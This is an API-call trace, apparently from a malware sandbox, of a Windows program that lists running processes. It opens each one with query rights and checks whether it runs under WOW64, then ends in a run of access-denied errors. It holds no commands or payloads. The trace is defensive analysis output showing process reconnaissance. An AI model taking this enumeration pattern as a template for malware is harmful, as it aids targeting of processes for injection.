	[0073.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.481] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.481] CloseHandle (hObject=0x224) returned 1
	[0073.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.482] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.482] CloseHandle (hObject=0x224) returned 1
	[0073.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7288d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.482] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.482] CloseHandle (hObject=0x224) returned 1
	[0073.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.482] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.482] CloseHandle (hObject=0x224) returned 1
	[0073.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.482] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.482] CloseHandle (hObject=0x224) returned 1
	[0073.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0073.483] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.483] CloseHandle (hObject=0x224) returned 1
	[0073.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728858, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0073.483] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.483] CloseHandle (hObject=0x224) returned 1
	[0073.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0073.483] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.483] CloseHandle (hObject=0x224) returned 1
	[0073.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0073.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0073.483] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.483] CloseHandle (hObject=0x224) returned 1
	[0073.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0073.484] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.484] CloseHandle (hObject=0x224) returned 1
	[0073.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0073.484] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.484] CloseHandle (hObject=0x224) returned 1
	[0073.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0073.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0073.484] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.484] CloseHandle (hObject=0x224) returned 1
	[0073.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0073.484] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.484] CloseHandle (hObject=0x224) returned 1
	[0073.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0073.485] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.485] CloseHandle (hObject=0x224) returned 1
	[0073.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728818, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0073.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0073.485] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.485] CloseHandle (hObject=0x224) returned 1
	[0073.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e8d8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0073.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0073.485] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.485] CloseHandle (hObject=0x224) returned 1
	[0073.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0073.485] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.485] CloseHandle (hObject=0x224) returned 1
	[0073.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0073.485] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.485] CloseHandle (hObject=0x224) returned 1
	[0073.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0073.486] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.486] CloseHandle (hObject=0x224) returned 1
	[0073.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7289b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0073.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0073.486] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.486] CloseHandle (hObject=0x224) returned 1
	[0073.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.486] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.486] CloseHandle (hObject=0x224) returned 1
	[0073.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.486] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.486] CloseHandle (hObject=0x224) returned 1
	[0073.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.487] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.487] CloseHandle (hObject=0x224) returned 1
	[0073.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e888, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.487] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.487] CloseHandle (hObject=0x224) returned 1
	[0073.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.487] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.487] CloseHandle (hObject=0x224) returned 1
	[0073.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.487] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.487] CloseHandle (hObject=0x224) returned 1
	[0073.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728a38, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.487] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.488] CloseHandle (hObject=0x224) returned 1
	[0073.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.488] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.488] CloseHandle (hObject=0x224) returned 1
	[0073.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728a98, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.488] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.488] CloseHandle (hObject=0x224) returned 1
	[0073.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e720, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.488] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.488] CloseHandle (hObject=0x224) returned 1
	[0073.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e810, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.488] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.488] CloseHandle (hObject=0x224) returned 1
	[0073.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.489] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
	[0073.490] GetLastError () returned 0x5
